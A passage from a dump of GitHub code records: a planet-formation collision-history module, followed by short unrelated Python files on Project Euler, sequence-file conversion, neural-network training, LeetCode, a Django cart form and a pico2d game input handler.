version\"\"\"\n\n #add in all collisions that are not already in the collision table\n #add pid column\n pid_col = Column(p*np.ones(len(clist)))\n clist.add_column(pid_col, name='pid',index=0)\n\n #iterate through collision list\n for j in 
range(0,len(clist)):\n #search through only collisions for this planet\n maskp = pcoll['pid'] == p\n mask_collpid = []\n for r in pcoll[maskp]:\n mask_row = []\n for keys in pcoll.keys():\n mask_row += [r[keys] == clist[keys][j]]\n mask_collpid += [np.prod(mask_row)]\n duplicate = np.sum(mask_collpid)\n\n if not duplicate: #if the collision is not already in the history\n maskt = pcoll['time'] == clist[j]['time']\n pcoll.add_row(clist[j]) #add to pcoll\n\n if clist['itype'][j] == 4 or clist['itype'][j] >= 8:\n #add in new ids, otherwise don't care about other id coll history\n #if the secondary id is new, add to list\n if clist[iname][j] not in master_ids['id']:\n new_ids.add_row([clist[iname][j],clist['time'][j]])\n #if secondary id has later time, add to list\n else:\n mask_master = master_ids['id'] == clist[iname][j]\n if master_ids[mask_master]['time'] < clist['time'][j]:\n new_ids.add_row([clist[iname][j],clist['time'][j]])\n return(pcoll,new_ids)\n\n\n\ndef find_prev_coll(pcoll,ids,master_ids,collnew,p):\n \"\"\"Function that finds previous collisions for a given list of planet ids.\n Inputs:\n pcoll = the table of collisions that are already in the collision history table\n ids = table of ids and their collision times to find previous collisions for\n master_ids = table of ids that already have previous collisions found\n collnew = list of collisions for the whole run\n p = the final planet id\n\n Output:\n pcoll = updated version of the pcoll table\"\"\"\n\n\n #table to put in ids that need to find previous collisions for\n ids_to_find = Table(names=('id','time'))\n #table of ids that are new in this iteration, used to make ids_to_find\n new_ids = Table(names=('id','time'))\n\n #iterate through ids\n for i in range(0,len(ids)):\n\n mask1 = collnew['iap'] == ids['id'][i] #check if they are targets\n mask2 = collnew['ilp'] == ids['id'][i] #check if they are projectiles\n maskt = collnew['time'] < ids['time'][i] #make sure it happens before the child collision\n\n #get list of new collisions to consider\n clist1 = collnew[mask1&maskt]\n clist2 = collnew[mask2&maskt]\n\n if len(clist1) > 0:\n\n pcoll, new_ids = iterate_clist(pcoll,clist1,master_ids,new_ids,'ilp',p)\n\n if len(clist2) > 0:\n\n pcoll, new_ids = iterate_clist(pcoll,clist2,master_ids,new_ids,'iap',p)\n\n #cut this down to unique values and earliest time\n if len(new_ids) > 1:\n\n ids_group = new_ids.group_by('id')\n #pick time that is largest for each group\n for key, group in zip(ids_group.groups.keys,ids_group.groups):\n new_time = np.max(group['time'])\n\n #if it's not already there, add to master list\n if key['id'] not in master_ids['id']:\n master_ids.add_row([key['id'],new_time])\n\n #if it's not already there, need to look for new collisions\n ids_to_find.add_row([key['id'],new_time])\n elif key['id'] in master_ids['id']:\n mask_master = master_ids['id'] == key['id']\n #if this collisions is at an earlier time than the one you have, update time\n if master_ids[mask_master]['time'] < new_time:\n master_ids['time'][np.where(master_ids['id'] == key['id'])] = new_time\n\n #add to collisions to look for later collisions\n ids_to_find.add_row([key['id'],new_time])\n\n\n\n #if there's only one new id, just check it against master list\n elif len(new_ids) == 1:\n if new_ids['id'][0] not in master_ids['id']:\n master_ids.add_row([new_ids['id'][0],new_ids['time'][0]])\n\n #need to find new collisions for this id\n ids_to_find.add_row([new_ids['id'][0],new_ids['time'][0]])\n elif new_ids['id'][0] in master_ids['id']:\n 
mask_master = master_ids['id'] == new_ids['id'][0]\n if master_ids[mask_master]['time'] < new_ids['time'][0]:\n master_ids['time'][np.where(master_ids['id'] == new_ids['id'][0])] = new_ids['time'][0]\n\n #add to collisions to look for later collisions\n ids_to_find.add_row([new_ids['id'][0],new_ids['time'][0]])\n\n #find new collisions if there are any new ids\n if len(ids_to_find) == 0:\n return(pcoll,master_ids)\n elif len(ids_to_find) > 0:\n return(find_prev_coll(pcoll,ids_to_find,master_ids,collnew,p))\n\n\ndef get_small_coll(base_dir,dirn,scoll,emb_list,mtiny,p):\n \"\"\"Get the number of small collisions that occur over a planet's formation\n\n Input:\n base_dir = directory that folders are in\n dirn = folder name for this run\n scoll = table of the small collisions that happen to the planet\n emb_list = a table of the embryo ids that make up a planet's history, and time they entered that history\n mtiny = minimum embryo mass\n p = planet id\n\n Output:\n scoll = table of collision data \"\"\"\n \n #read in collision info\n colls = util.read_follow(base_dir,dirn)\n\n#get table with only small collisions\n maskm = colls['pmass'] < mtiny\n colls_small = colls[maskm]\n \n #get debris origin here\n debris = Table.read(base_dir+dirn+'/debris.origin',format='ascii.no_header',\n names=('time','d_iinit','origin'))\n \n \n for m in emb_list['id']:\n #only need ones where target is the same, we're looking at debris projectiles\n tmask = colls_small['iap'] == m\n slist = colls_small[tmask]\n \n if len(slist)>0:\n \n origin_time = [] ; origin_id = []\n #add debris origin and time\n for i in range(0,len(slist)):\n maskdi = debris['d_iinit'] == slist['ilp'][i]\n \n if len(debris[maskdi]) <= 0:\n origin_time.append(0)\n origin_id.append(0)\n else:\n origin_time.append(debris[maskdi]['time'][0])\n origin_id.append(debris[maskdi]['origin'][0])\n \n\n #add debris origin info\n slist.add_column(origin_time,name='origin_time')\n slist.add_column(origin_id,name='origin_id')\n \n \n #add pid\n slist.add_column([p]*len(slist),name='pid',index=0)\n slist.add_column(['other']*len(slist),name='origin_type')\n scoll = vstack([scoll,slist]) \n \n #origin type\n #sort into three groups: re-accretion, accretion from other bodies, \n #or specifically accretion from planets destroyed by supercatastrophic disruption\n mask = np.isin(scoll['origin_id'],emb_list['id'])\n scoll['origin_type'][mask] = 'reacc'\n \n mask1 = colls['itype'] == 1\n ids1 = np.concatenate((np.array(colls[mask1]['iap']),np.array(colls[mask1]['ilp'])),axis=0)\n maskin1 = np.isin(scoll['origin_id'],ids1)\n scoll['origin_type'][maskin1] = 'supercat'\n \n \n return(scoll)\n\ndef calc_coll_all(base_dir,fdir,coll,cparam,minemb,nparam,cname_min,cname_max,pl_ids=None):\n \"\"\"Calculating collisional history for planets. Calls find_prev_coll\n Inputs:\n base_dir = directory where runs are\n fdir = directory of simulation\n cparam = collision size to do collhist for. Options are: 'giant','small', or 'all'.\n coll = table of all giant collisions \n minemb = minimum embryo mass\n nparam = possible values are 'all' or 'some'. If all, computes collision history for all final planets. If 'some', computes collision history for planets listed in pl_ids. \n pl_ids = ids of planets to find collision histories for. 
Default value is None\n cname_min = name of the min-core comp file\n cname_max = name of the max-core comp file\n \n Outputs:\n pcoll = table of all giant collision histories\n scoll = table of all small collision histories\"\"\"\n \n print(fdir)\n\n dtsyn = Table(names=('dt','tloss1','tloss2'))\n DT = []\n pcoll = Table(names=('pid','dir','dloss','ecc','inc','slope','time','a','iac','iap','tmass',\n 'CMFt','CMFt_min','il','ilp','pmass','CMFp','CMFp_min','itype','iLR','LRMass',\n 'CMFLR','CMFLR_min','iSLR','SLRMass','CMFSLR','CMFSLR_min','inew','ideb','mdeb',\n 'id1','id2','ctype','gamma','b','bcrit','vesc','vimp','vescalpha','veros','vcat',\n 'vsup','vhr','reveros','revsup'),\n dtype=('int64','U100','U12','float64','float64','U12','float64','float64','int64','int64',\n 'float64','float64','float64','int64','int64','float64','float64','float64','int64',\n 'int64','float64','float64','float64','int64','float64','float64','float64','int64',\n 'int64','float64','int64','int64','int64','float64','float64','float64','float64',\n 'float64','float64','float64','float64','float64','float64','float64','float64'))\n\n scoll = Table(names=('pid','time','a','iac','iap','tmass',\n 'CMFt','CMFt_min','il','ilp','pmass','CMFp','CMFp_min','itype','iLR','LRMass',\n 'CMFLR','CMFLR_min','iSLR','SLRMass','CMFSLR','inew','ideb','mdeb',\n 'origin_time','origin_id','origin_type'),\n dtype=('int64','float64','float64','int64','int64','float64','float64',\n 'float64','int64','int64','float64','float64','float64','int64',\n 'int64','float64','float64','float64','int64','float64',\n 'float64','int64','int64','float64','float64','int64','U24'))\n \n #read in comp file to get final planets\n comp = util.read_comp(base_dir,fdir,'astropy',cname_min,cname_max)\n \n print(len(coll))\n\n mtiny = np.genfromtxt(base_dir+fdir+'/continue.in')\n \n if nparam == 'all':\n #make list of final planets\n plnts = comp.group_by('time')\n l = len(plnts.groups)\n\n #planets here are all embryos above some minimum embryo mass\n allplanets = plnts.groups[l-1]\n if minemb == 'embryo':\n maskmp = allplanets['mass'] > mtiny[2]*munit/mearth\n else:\n maskmp = allplanets['mass'] >= minemb\n planets = allplanets[maskmp]\n pl_ids = planets['iinit']\n\n elif nparam == 'some':\n if pl_ids is None or len(pl_ids) == 0: #pl_ids must be supplied when nparam == 'some'\n raise Exception('Error: for plparam == some, you must have a planet id column in dirtable')\n #planets['iinit'] = pl_ids #should this also have a time component? 
\n\n for p in pl_ids:\n\n #make table for the ids you're searching for\n ids = Table(names=('id','time'))\n ids.add_row([p,1e8])\n #make table for the master list of ids and add planet id\n master_ids = Table(names=('id','time'))\n master_ids.add_row([p,1e8])\n\n lp = len(pcoll)\n lm = len(master_ids)\n ls = len(scoll)\n\n if cparam == 'all' or cparam == 'giant':\n #find all collisions\n maskm = coll['tmass'] >= mtiny[2]\n maskm2 = coll['pmass'] >= mtiny[2]\n collnew = coll[maskm&maskm2]\n pcoll,master_ids = find_prev_coll(pcoll,ids,master_ids,collnew,p)\n\n if cparam == 'all' or cparam == 'small':\n #here is where we figure out how many small collisions have happened to a body\n scoll = get_small_coll(base_dir,fdir,scoll,master_ids,mtiny[2],p)\n\n if cparam == 'all' or cparam == 'giant':\n if len(pcoll) == lp:\n if len(master_ids) == lm:\n #add a line for this id that has no collisions\n dloss = collnew['dloss'][0]\n ecc = collnew['ecc'][0]\n inc = collnew['inc'][0]\n slope = collnew['slope'][0]\n time = planets['time'][0]\n ip = np.where(planets['iinit'] == p)\n a = planets['a'][ip]\n mass = planets['mtot'][ip]\n pcoll.add_row([p,fdir,dloss,ecc,inc,slope,time,a,0,p,mass,0,0,0,0,0,\n 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0])\n elif len(master_ids) != lm:\n print('Error: pcoll same length but not master_ids')\n print(lm,len(master_ids))\n print(lp,len(pcoll))\n print(master_ids[lm-1])\n print(pcoll[lp-1])\n\n if cparam == 'all' or cparam == 'small':\n if len(scoll) == ls:\n #add a line for this id that has no collisions\n ip = np.where(planets['iinit'] == p)\n scoll.add_row([p,planets['time'][0],planets['a'][ip],0,p,planets['mtot'][ip],\n 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,p,'none'])\n\n return(pcoll,scoll)\n\ndef add_param_cols(dir_tab,scoll):\n \"\"\"Adds in simulation or directory parameter columns to scoll.\n Inputs: \n dir_tab = row of a table with directories and parameters for each directory to read in\n scoll = table of small collision histories for a directory\n \n Outputs: \n scoll = updated with directory parameters\"\"\"\n \n dir_c = Column([dir_tab['dir']]*len(scoll))\n dloss = Column([dir_tab['dloss']]*len(scoll))\n ecc = Column([dir_tab['av_ecc']]*len(scoll))\n inc = Column([dir_tab['av_inc']]*len(scoll))\n slope =Column([dir_tab['slope']]*len(scoll))\n scoll.add_column(dir_c,name='dir',index=1)\n scoll.add_column(dloss,name='dloss',index=2)\n scoll.add_column(ecc,name='ecc',index=3)\n scoll.add_column(inc,name='inc',index=4)\n scoll.add_column(slope,name='slope',index=5)\n return(scoll)\n \n\ndef get_collhist(base_dir,vtab_name,cparam,minemb,fname,fname_s,ovw,dirparam,plparam,dirtable,\n folname_min='follow.mincorecollisions-nograzefa',\n folname_max='follow.maxcorecollisions-nograzefa',\n cname_min='pl.mincorecompositions-nograzefa',cname_max='pl.maxcorecompositions-nograzefa'):\n \"\"\"Calls calc_coll_all for dirs in dirtable. Creates and writes a table for small collisions and giant collisions, depending on input.\n \n Input:\n base_dir = directory where data is\n dirtable = table of directory names and parameters that you want your table generated from\n vtab_name = table of all giant collisions\n cparam = collision size to do collhist for. Options are: 'giant','small', or 'all'\n minemb = minimum embryo mass. 
Options are 'embryo' or the minimum embryo mass you want.\n fname = name for giant collision history table\n fname_s = name for small collision history table\n ovw = if True, overwrite any existing files of that name\n dirparam = if 'all', do all directories and planets. If 'some', do a selection of directories and planets. If 'one', do only one directory. Planet ids must be in dirtable\n plparam = if 'some', do a selection of planet ids. If 'one', do only one planet id. Planet ids must be in dirtable \n folname_min = name of the min-core follow file, default value is follow.mincorecollisions-nograzefa\n folname_max = name of the max-core follow file, default value is follow.maxcorecollisions-nograzefa\n cname_min = name of the min-core comp file, default value is pl.mincorecompositions-nograzefa\n cname_max = name of the max-core comp file, default value is pl.maxcorecompositions-nograzefa\n \n Output:\n collhist = giant collision history table\n collhist_small = small collision history table\"\"\"\n \n collhist = Table(names=('pid','dir','dloss','ecc','inc','slope','time','a','iac','iap','tmass','CMFt','CMFt_min','il','ilp','pmass','CMFp','CMFp_min',\n 'itype','iLR','LRMass','CMFLR','CMFLR_min','iSLR','SLRMass','CMFSLR','CMFSLR_min','inew','ideb','mdeb',\n 'id1','id2','ctype','gamma','b','bcrit','vesc','vimp','vescalpha','veros','vcat','vsup','vhr','reveros','revsup'),\n dtype=('int64','U100','U12','float64','float64','U12','float64','float64','int64','int64','float64','float64','float64',\n 'int64','int64','float64','float64','float64','int64','int64','float64','float64','float64','int64','float64','float64','float64','int64',\n 'int64','float64','int64','int64','int64','float64','float64','float64','float64','float64','float64','float64','float64',\n 'float64','float64','float64','float64'))\n \n collhist_small = Table(names=('pid','dir','dloss','ecc','inc','slope','time','a','iac','iap','tmass','CMFt','CMFt_min',\n 'il','ilp','pmass','CMFp','CMFp_min','itype','iLR','LRMass','CMFLR','CMFLR_min',\n 'iSLR','SLRMass','CMFSLR','inew','ideb','mdeb','origin_time','origin_id'),\n dtype=('int64','U100','U12','U12','U12','U12','float64','float64','int64','int64','float64','float64',\n 'float64','int64','int64','float64','float64','float64','int64','int64','float64','float64',\n 'float64','int64','float64','float64','int64','int64','float64','float64','int64'))\n\n \n #read in table of directories and names\n #do I group both of these tables, or do I just do two separate loops for each one?\n dir_tab = Table.read(base_dir+dirtable)\n \n try:\n #read in collision information table\n vtab = Table.read(base_dir+vtab_name)\n except Exception:\n #generate table if it doesn't exist already\n vtab = get_allvel(base_dir,dir_tab,vtab_name,True,folname_min,folname_max)\n \n if plparam == 'some':\n # add in a test to make sure there's an ids column, and exit with error if not?\n dirgrouped = dir_tab.group_by('dir')\n \n if dirparam == 'one': #not elif: this branch must also run when plparam == 'some'\n #only get collhist for one simulation or directory \n if plparam == 'one':\n #get coll history for one planet \n pl_ids = [dirtable['iinit'][0]]\n dmask = vtab['dir'] == dirtable['dir'][0]\n pcoll,scoll = calc_coll_all(base_dir,dirtable,vtab[dmask],cparam,minemb,'some',cname_min,cname_max,pl_ids)\n elif plparam == 'some':\n #get coll history for pl_ids\n pl_ids = dirtable['iinit']\n dmask = vtab['dir'] == dirtable['dir'][0]\n pcoll,scoll = calc_coll_all(base_dir,dirtable,vtab[dmask],cparam,minemb,'some',cname_min,cname_max,pl_ids)\n elif plparam == 'all':\n dmask = vtab['dir'] == dirtable\n pcoll,scoll = 
calc_coll_all(base_dir,dirtable,vtab[dmask],cparam,minemb,'all',cname_min,cname_max)\n \n if dirparam == 'all':\n for i in range(0,len(dir_tab)):\n #iterate through directories in the table\n dmask = vtab['dir'] == dir_tab['dir'][i] #get velocity table for that run\n pcoll, scoll = calc_coll_all(base_dir,dir_tab['dir'][i],vtab[dmask],cparam,minemb,'all',cname_min,cname_max)\n collhist = vstack([collhist,pcoll])\n \n if cparam == 'small' or cparam == 'all':\n #add columns with init params from dir_tab\n scoll = add_param_cols(dir_tab[i],scoll)\n collhist_small = vstack([collhist_small,scoll])\n \n elif dirparam == 'some':\n for key, group in zip(dirgrouped.groups.keys, dirgrouped.groups):\n dmask = vtab['dir'] == key['dir']\n if plparam == 'some':\n #call calc_coll_all for some\n pl_ids = group['iinit']\n pcoll, scoll = calc_coll_all(base_dir,key['dir'],vtab[dmask],cparam,minemb,'some',cname_min,cname_max,pl_ids)\n collhist = vstack([collhist,pcoll])\n elif plparam == 'one':\n pl_ids = group['iinit']\n pcoll, scoll = calc_coll_all(base_dir,key['dir'],vtab[dmask],cparam,minemb,'some',cname_min,cname_max,pl_ids)\n collhist = vstack([collhist,pcoll])\n \n if cparam == 'small' or cparam == 'all':\n #add columns with init params from dir_tab, matching this directory's row by name\n dir_row = dir_tab[dir_tab['dir'] == key['dir']][0]\n scoll = add_param_cols(dir_row,scoll)\n collhist_small = vstack([collhist_small,scoll])\n \n \n if cparam == 'giant' or cparam == 'all':\n collhist.write(base_dir+fname,format='ascii.csv',overwrite=ovw)\n if cparam == 'small' or cparam == 'all':\n collhist_small.write(base_dir+fname_s,format='ascii.csv',overwrite=ovw)\n \n if cparam == 'all':\n return(collhist,collhist_small)\n elif cparam == 'giant':\n return(collhist)\n elif cparam == 'small':\n return(collhist_small)\n","repo_name":"jscora/colltree","sub_path":"colltree/find_coll_history.py","file_name":"find_coll_history.py","file_ext":"py","file_size_in_byte":25475,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"29226587479","text":"# calculate the number of non-bouncy numbers below 10^100\n\nfrom itertools import product\n\ndef binom(n,k):\n \"\"\" Returns binomial coefficients using multiplicative formula \"\"\"\n # http://en.wikipedia.org/wiki/Binomial_coefficient\n res = 1\n for i in range(1,k+1):\n res *= (n-i+1)/i\n\n return int(round(res,0))\n\n# 10^power is the given upper limit\npower_10 = 100\n\n# n_max: number of digits considered - 1. \n# limit 10^2 = 100 > 99 max = 2 digits, represented by lattice path 0,9 to 1,9\nn_max = power_10-1\n\n# sum all possible lattice paths going up from 0.0 to 1.1, 1.2, 1.3, ..., 1.9 \nsum_up = 0\nfor i in range(1,10):\n sum_up += binom(n_max+i,i)\n\n# sum all possible paths down. 
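\n# (for reference: binom(n+i, i) counts the monotone lattice paths from the\n# origin to (n, i); e.g. binom(5, 2) == 10 paths across a 3 x 2 grid, which\n# is the counting identity both sums in this script rely on)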
\n# leading zeros are allowed, e.g.: \n# a lattice path won't come across 090 when n_max = 3, \n# which is the same as 90 when n_max = 2\n# so the sum must also run over all smaller possible n's\nsum_down = 0\nfor n_i in product(range(1,n_max+1),range(1,10)):\n\n n, i = n_i[0], n_i[1]\n sum_down += binom(n+i,i)\n\n# doubles, all 'flat' lines in the lattice paths, e.g.: 1, 11, 111, 9999\n# 9 flat paths per digit, except 1,2,3,4,5,6,7,8,9 \n# but sum down starts at 2 digits so n_max works\ndoubles = 9*n_max\n\nprint(sum_up+sum_down-doubles)\n\n","repo_name":"mccornet/project_euler_2014","sub_path":"problem_113.py","file_name":"problem_113.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20456662990","text":"# This file converts the generated sequence files from a2m format into the txt files that live in the data/ folder\r\n\r\nimport os\r\nfiles = os.listdir('./data_a2m/')\r\n\r\nfor filename in files:\r\n file = open('./data_a2m/'+filename,'r')\r\n if filename.split('.')[0]+'.txt' in files :\r\n continue\r\n output = ''\r\n out_line = ''\r\n lines = [line.replace('\\n','') for line in file]\r\n for line in lines[1:] :\r\n if line == '' :\r\n continue\r\n if line[0] == '>' :\r\n output += out_line+'\\n' \r\n out_line = ''\r\n continue\r\n out_line += line\r\n if out_line :\r\n output += out_line+'\\n' #flush the final sequence, which has no header line after it\r\n file.close()\r\n file = open('./data/'+filename.split('.')[0]+'.txt','w')\r\n file.write(output)\r\n file.close()\r\n","repo_name":"abdellahrami/ClassificationRNA","sub_path":"a2m_to_txt.py","file_name":"a2m_to_txt.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"69864403666","text":"import argparse\nimport json\nimport os\nimport time\nfrom collections import defaultdict\n\nimport graphviz\n\nimport numpy as np\nimport torch\nfrom torch import optim\n\nimport tart\nimport data\nimport baselines\nfrom utils import str2bool\n\n\ndef to_model(args, num_features, num_classes):\n if args.model == 'MLP':\n return baselines.MLP(num_features, num_classes,\n num_layers=args.layers)\n elif args.model == 'TART-dense':\n return tart.make_network(num_features, num_classes,\n depth=args.depth,\n style=args.style,\n activation=args.activation,\n num_nodes=args.nodes)\n elif args.model == 'TART':\n return tart.make_tree(num_features, num_classes,\n depth=args.depth,\n decision_units=args.decision_units,\n style=args.style,\n activation=args.activation,\n window=args.window,\n leaf_layers=args.layers,\n leaf_units=args.units,\n temperature=args.temperature,\n decision_shared=args.decision_shared)\n else:\n raise ValueError(args.model)\n\n\ndef to_device(gpu):\n if torch.cuda.is_available():\n return torch.device(f'cuda:{gpu}')\n else:\n return torch.device('cpu')\n\n\ndef count_parameters(model):\n return sum(p.numel() for p in model.parameters() if p.requires_grad)\n\n\ndef update(model, device, loader, optimizer):\n model.train()\n for x, y in loader:\n x = x.to(device).view(x.size(0), -1)\n y = y.to(device)\n optimizer.zero_grad()\n loss = model.loss(x, y)\n loss.backward()\n optimizer.step()\n\n\n@torch.no_grad()\ndef evaluate(model, device, loader):\n model.eval()\n loss_sum, acc_sum, num_data = 0, 0, 0\n for x, y in loader:\n x = x.to(device).view(x.size(0), -1)\n y = y.to(device)\n loss_sum += model.loss(x, y).item() * x.size(0)\n acc_sum += torch.eq(torch.argmax(model.forward(x), dim=1), y).sum().item()\n num_data += x.size(0)\n return loss_sum / num_data, acc_sum / 
num_data\n\n\n@torch.no_grad()\ndef visualize(model, data_x, dir_out, device, num_samples=100):\n node_idx = defaultdict(lambda: len(node_idx) + 1)\n\n def to_node_idx(l, i):\n return str(node_idx[(l, i)])\n\n def to_width(value):\n return str(0.4 + 2.6 * value)\n\n def draw_nodes(graph_, p_list_):\n graph_.node(to_node_idx(0, 0), penwidth=to_width(1))\n for l, vec_p in enumerate(p_list_[1:]):\n for j in range(vec_p.shape[0]):\n graph_.node(to_node_idx(l + 1, j), penwidth=to_width(vec_p[j]))\n\n def draw_edges(graph_, p_list_, t_list_):\n for l, (mat_t, vec_p) in enumerate(zip(t_list_, p_list_[:-1])):\n mat_t = mat_t * vec_p\n for i in range(mat_t.shape[1]):\n for j in range(mat_t.shape[0]):\n if mat_t[j, i] > 0:\n src_idx = to_node_idx(l, i)\n dst_idx = to_node_idx(l + 1, j)\n graph_.edge(src_idx, dst_idx, penwidth=to_width(mat_t[j, i]))\n\n model.eval()\n data_x = torch.from_numpy(data_x[:num_samples, :]).to(device)\n for sample in range(data_x.size(0)):\n t_list, p_list = model.decision_path(data_x[sample].unsqueeze(0))\n t_list = [t.squeeze(0).cpu().numpy() for t in t_list]\n p_list = [p.squeeze(0).cpu().numpy() for p in p_list]\n\n graph = graphviz.Digraph(graph_attr=dict(margin=str(0.1),\n nodesep=str(0.1),\n ranksep=str(0.3)),\n node_attr=dict(width=str(0.4),\n height=str(0.4),\n fixedsize=str(True),\n style='filled'),\n edge_attr=dict(arrowhead='none'))\n\n draw_nodes(graph, p_list)\n draw_edges(graph, p_list, t_list)\n\n graph.format = 'pdf'\n graph.filename = str(sample)\n graph.directory = dir_out\n graph.render(view=False)\n os.remove(os.path.join(dir_out, str(sample)))\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n\n # Experimental settings.\n parser.add_argument('--model', type=str, required=True)\n parser.add_argument('--gpu', type=int, default=0)\n parser.add_argument('--data', type=str, default='breast-tissue')\n parser.add_argument('--fold', type=int, default=0)\n parser.add_argument('--data-path', type=str, default='../data')\n parser.add_argument('--out', type=str, default='../out')\n parser.add_argument('--save', action='store_true', default=False)\n parser.add_argument('--visualize', action='store_true', default=False)\n\n # Major model settings.\n parser.add_argument('--layers', type=int, required=True)\n parser.add_argument('--units', type=int, default=100)\n parser.add_argument('--decision-units', type=int, default=0)\n parser.add_argument('--decision-shared', type=str2bool, default=False)\n parser.add_argument('--depth', type=int, default=None)\n parser.add_argument('--nodes', type=int, default=16)\n parser.add_argument('--style', type=str, default=None)\n\n # Model settings for trees.\n parser.add_argument('--shape', type=str, default='custom')\n parser.add_argument('--window', type=int, default=2)\n parser.add_argument('--stride', type=int, default=2)\n parser.add_argument('--padding', type=int, default=0)\n parser.add_argument('--root-window', type=int, default=0)\n parser.add_argument('--temperature', type=float, default=1.)\n parser.add_argument('--activation', type=str, default='softmax')\n\n # Training settings.\n parser.add_argument('--epochs', type=int, default=200)\n parser.add_argument('--batch-size', type=int, default=1024)\n parser.add_argument('--lr', type=float, default=5e-3)\n parser.add_argument('--decay', type=float, default=0.)\n\n return parser.parse_args()\n\n\ndef check_args_validity(args):\n if args.model == 'TART':\n assert args.depth is not None\n assert args.style is not None\n\n\ndef to_out_path(args):\n if args.model == 
'MLP':\n return os.path.join(args.out, f'{args.model}-{args.layers}')\n elif args.model == 'TART':\n model_name = f'{args.model}-D{args.depth}'\n if args.window > 2:\n model_name = f'{model_name}-W{args.window}'\n model_name = f'{model_name}-L{args.layers}-{args.style}'\n return os.path.join(args.out, model_name)\n else:\n raise ValueError(args.model)\n\n\ndef main():\n start_time = time.time()\n args = parse_args()\n check_args_validity(args)\n out_path = to_out_path(args)\n dataset = args.data\n device = to_device(args.gpu)\n\n fold = args.fold\n np.random.seed(fold)\n torch.manual_seed(fold)\n\n trn_x, trn_y, test_x, test_y = data.read_data(args.data_path, dataset, fold)\n num_features = trn_x.shape[1]\n num_classes = trn_y.max() + 1\n trn_loader = data.to_loader(trn_x, trn_y, args.batch_size, shuffle=True)\n test_loader = data.to_loader(test_x, test_y, args.batch_size)\n\n model = to_model(args, num_features, num_classes)\n optimizer = optim.Adam(model.parameters(), lr=args.lr, weight_decay=args.decay)\n\n log_out = os.path.join(out_path, f'logs/{dataset}/{fold}.txt')\n os.makedirs(os.path.dirname(log_out), exist_ok=True)\n with open(log_out, 'w') as f:\n f.write('epoch\\ttrn_loss\\ttrn_acc\\tis_best\\n')\n\n try:\n model = model.to(device)\n best_loss, best_epoch = np.inf, 0\n for epoch in range(args.epochs + 1):\n if epoch > 0:\n update(model, device, trn_loader, optimizer)\n trn_loss, trn_acc = evaluate(model, device, trn_loader)\n\n if trn_loss < best_loss:\n best_loss = trn_loss\n best_epoch = epoch\n\n with open(log_out, 'a') as f:\n f.write(f'{epoch:5d}\\t{trn_loss:.4f}\\t{trn_acc:.4f}\\t')\n if epoch == best_epoch:\n f.write('\\tBEST')\n f.write('\\n')\n\n _, trn_acc = evaluate(model, device, trn_loader)\n _, test_acc = evaluate(model, device, test_loader)\n\n if args.visualize:\n dir_out = os.path.join(out_path, 'graphviz', args.data, str(args.fold))\n visualize(model, test_x, dir_out, device, num_samples=100)\n\n if args.save:\n model_out = os.path.join(out_path, 'models-{}/{}.pth'.format(fold, dataset))\n os.makedirs(os.path.dirname(model_out), exist_ok=True)\n torch.save(model.state_dict(), model_out)\n\n except RuntimeError as e:\n if not str(e).startswith('CUDA out of memory.'):\n raise e\n trn_acc = -np.inf\n test_acc = -np.inf\n\n out = {arg: getattr(args, arg) for arg in vars(args)}\n out['out_path'] = out_path\n out['result'] = dict(\n trn_acc=trn_acc,\n test_acc=test_acc,\n params=count_parameters(model),\n time=time.time() - start_time)\n print(json.dumps(out))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"leesael/TART","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9403,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"23066006030","text":"from typing import List\nclass Solution:\n def reverseString(self, s: List[str]) -> None:\n \"\"\"\n Do not return anything, modify s in-place instead.\n \"\"\"\n self.reverseRecursive(s, 0, len(s)-1)\n \n def reverseRecursive(self,s:List[str], start:int,end:int):\n if start > end:\n return\n (s[start],s[end]) = (s[end],s[start])\n self.reverseRecursive(s,start+1,end-1)\ns=Solution()\nl=[\"h\",\"e\",\"l\",\"l\",\"o\"]\nprint(s.reverseString(l))\nprint(l)","repo_name":"vasu8480/Programs-HackerRank-LeetCode-","sub_path":"Python/Leetcode/Complete Data Structures and Algorithms Software Interviews/5 Trees/Reverse String(344).py","file_name":"Reverse 
String(344).py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"44230353142","text":"from django.forms import Form, ModelForm, ChoiceField\n\nfrom ekozmp.apps.cart.models import CartItem\nfrom ekozmp.apps.market.models import SellerProduct\n\n\nclass AddToCartForm(ModelForm):\n\n def __init__(self, *args, **kwargs):\n # print(f'CARTFORM: \\n--object: {dir(object)}\\n-- kwargs: {kwargs}\\n-- self: {dir(self)}')\n product = kwargs.pop('product', None)\n print(f'got instance: {product}')\n super().__init__(*args, **kwargs)\n self.fields['quantity'].widget.attrs.update(style='width: 1em;')\n for option_name, option_values in product.options.items():\n option_tuple = [('', '')] + [(o.lower(), o) for o in option_values]\n self.fields[f'option_{option_name.lower()}'] = ChoiceField(\n choices=option_tuple,\n initial='',\n label=option_name)\n\n class Meta:\n model = CartItem\n fields = ['quantity', ]\n","repo_name":"teschmitt/ekozmp","sub_path":"ekozmp/apps/cart/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13699060128","text":"from pico2d import *\n\nTUK_WIDTH, TUK_HEIGHT = 1280, 1024\n\n\ndef handle_events():\n global running\n global x, y\n global dir\n\n global L_R_check\n events = get_events()\n for event in events:\n if event.type == SDL_QUIT:\n running = False\n elif event.type == SDL_KEYDOWN:\n if event.key == SDLK_RIGHT:\n dir = 1\n L_R_check = 1\n elif event.key == SDLK_LEFT:\n dir = 2\n L_R_check = 2\n elif event.key == SDLK_UP:\n dir = 3\n elif event.key == SDLK_DOWN:\n dir = 4\n \n elif event.key == SDLK_ESCAPE:\n running = False\n elif event.type == SDL_KEYUP:\n if 